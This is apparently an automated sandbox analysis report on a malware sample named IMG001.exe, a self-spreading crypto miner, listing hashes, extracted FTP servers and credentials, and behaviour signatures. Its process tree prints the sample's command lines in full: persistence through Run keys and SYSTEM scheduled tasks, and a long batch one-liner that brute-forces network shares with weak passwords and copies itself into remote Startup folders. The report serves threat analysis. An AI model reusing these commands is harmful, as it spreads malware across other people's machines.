Analysis
- max time kernel: 149s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-09-2022 13:56
Static task
- static1
Behavioral task
- behavioral1
- Sample: IMG001.exe
- Resource: win7-20220901-en
Behavioral task
- behavioral2
- Sample: IMG001.exe
- Resource: win10v2004-20220812-en
General
- Target: IMG001.exe
- Size: 3.5MB
- MD5: 87882046d21d2468ee993ea7c3159c4d
- SHA1: 525114e7e4bde3c2e9620f598dc21071888b44b6
- SHA256: edc049f43e49ebc789a64818b7a1c52e37dd248e735d86606d92162dce599130
- SHA512: bce07ca371c0a7aa6d214ff3ff3fb05c45891f56d1834c06a563b1adb0d1c3eee9829ac73b4652677ba916aa147913d135939d0d3a2f7af4aa1469af3389ffc6
- SSDEEP: 98304:M8LuVPnq1y5tQOM33ZNqCtBixHl54Oyjes1boo:KVPq1yLanrqTr43eSX
Malware Config
Extracted
- Protocol: ftp
- Host: 62.129.233.167
- Port: 21
- Username: anonymous
Extracted
- Protocol: ftp
- Host: 107.151.181.121
- Port: 21
- Username: admin
- Password: foster
Extracted
- Protocol: ftp
- Host: 112.230.136.19
- Port: 21
- Username: anonymous
Signatures
-
Contacts a large (872) amount of remote hosts (1 TTPs)
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE (3 IoCs)
Processes: tftp.exe, IMG001.exe, tftp.exe
pid | process
3496 | tftp.exe
32 | IMG001.exe
3020 | tftp.exe
-
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: IMG001.exe, IMG001.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | IMG001.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | IMG001.exe
-
Drops startup file (1 IoCs)
Processes: IMG001.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk | IMG001.exe
-
Loads dropped DLL (5 IoCs)
Processes: IMG001.exe
pid | process
32 | IMG001.exe
32 | IMG001.exe
32 | IMG001.exe
32 | IMG001.exe
32 | IMG001.exe
-
Adds Run key to start application (2 TTPs, 4 IoCs)
Processes: reg.exe, IMG001.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run | IMG001.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" | IMG001.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | reg.exe
-
Enumerates connected drives (3 TTPs, 1 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: IMG001.exe
description | ioc | process
File opened (read-only) | \??\E: | IMG001.exe
-
Drops file in Windows directory (1 IoCs)
Processes: schtasks.exe
description | ioc | process
File created | C:\Windows\Tasks\UAC.job | schtasks.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer (4 IoCs)
resource | yara_rule
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | nsis_installer_1
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | nsis_installer_2
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | nsis_installer_1
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | nsis_installer_2
-
Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe, schtasks.exe
pid | process
3660 | schtasks.exe
4124 | schtasks.exe
-
Discovers systems in the same network (1 TTPs, 1 IoCs)
-
Kills process with taskkill (2 IoCs)
Processes: taskkill.exe, taskkill.exe
pid | process
4924 | taskkill.exe
3788 | taskkill.exe
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken (8 IoCs)
Processes: taskkill.exe, taskkill.exe, powercfg.exe, powercfg.exe, powercfg.exe
description | pid | process
Token: SeDebugPrivilege | 4924 | taskkill.exe
Token: SeDebugPrivilege | 3788 | taskkill.exe
Token: SeShutdownPrivilege | 3428 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3428 | powercfg.exe
Token: SeShutdownPrivilege | 1816 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1816 | powercfg.exe
Token: SeShutdownPrivilege | 2088 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2088 | powercfg.exe
-
Suspicious use of WriteProcessMemory (63 IoCs)
Processes
-
Level 1: C:\Users\Admin\AppData\Local\Temp\IMG001.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\IMG001.exe"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
Level 2: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /f /im tftp.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Users\Admin\AppData\Local\Temp\tftp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
- Executes dropped EXE
-
Level 2: C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
Command line: "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /f /im tftp.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Users\Admin\AppData\Local\Temp\tftp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
- Executes dropped EXE
-
Level 3: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\reg.exe
Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
- Adds Run key to start application
-
Level 3: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
- Creates scheduled task(s)
-
Level 3: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
- Drops file in Windows directory
- Creates scheduled task(s)
-
Level 3: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\powercfg.exe
Command line: powercfg /CHANGE -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\SysWOW64\powercfg.exe
Command line: powercfg /CHANGE -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\SysWOW64\powercfg.exe
Command line: Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0008& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
- Suspicious use of WriteProcessMemory
-
Level 5: C:\Windows\SysWOW64\net.exe
Command line: net view
- Discovers systems in the same network
-
Level 5: C:\Windows\SysWOW64\find.exe
Command line: find /i "\\"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\.htaccess
Filesize: 114B
MD5: 1cd7834fb975e468fccc8f027f69a528
SHA1: 56275eef952e6559b86a2cba0b9d45b0307f9dae
SHA256: 72e847a89d6a5e9e779ea2f6347b8780c0c0d72969f43777aa7ceb431bd3b024
SHA512: 14e5fdc4ee4d961f1da2272847d31ddd1559a36415f00a032ae71400956d897dbd88fd8c8d03aadad29888e729d5c5077d8620aec8e179440b0d5dce511f3338
-
C:\Users\Admin\AppData\Local\Temp\info.zip
Filesize: 1KB
MD5: 8604e0f263922501f749cfca447b041a
SHA1: 85c712bdeaceb78e2785e1f63811b0c4a50f952d
SHA256: 52ec3ba075a507e62bb6e3272fb13b30a8ddc0f62c4ea194311d558b338eb5ed
SHA512: 496d7a1b8b55d28387dad3f1c43e164bb567259c4cac21dd632ccd450dfbf28d431330c27ea72a5a8034979c325d19ff3fd8a3f7fc12b1122f67ef595630d5b2
-
C:\Users\Admin\AppData\Local\Temp\nsjC45B.tmp\inetc.dll
Filesize: 21KB
MD5: d7a3fa6a6c738b4a3c40d5602af20b08
SHA1: 34fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA256: 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA512: 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe
Filesize: 275KB
MD5: 7a4774111ad45d5b306c8ca8c5aca376
SHA1: 06d41d4f1fb72de905904f380efa564d0badbb91
SHA256: dd082c17a55a54173f105a9c38a71126e4521541b4a56be55546ab965136b039
SHA512: 29acf0f9bc82465e13f668d0667a802a20e297ea0f16c74bef49ba28b3ed1b7392418c6afbcd165ad3ce6e1e01d13e09d26fab17700764bddb5ef0d870aa7af7
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
Filesize: 3.5MB
MD5: 87882046d21d2468ee993ea7c3159c4d
SHA1: 525114e7e4bde3c2e9620f598dc21071888b44b6
SHA256: edc049f43e49ebc789a64818b7a1c52e37dd248e735d86606d92162dce599130
SHA512: bce07ca371c0a7aa6d214ff3ff3fb05c45891f56d1834c06a563b1adb0d1c3eee9829ac73b4652677ba916aa147913d135939d0d3a2f7af4aa1469af3389ffc6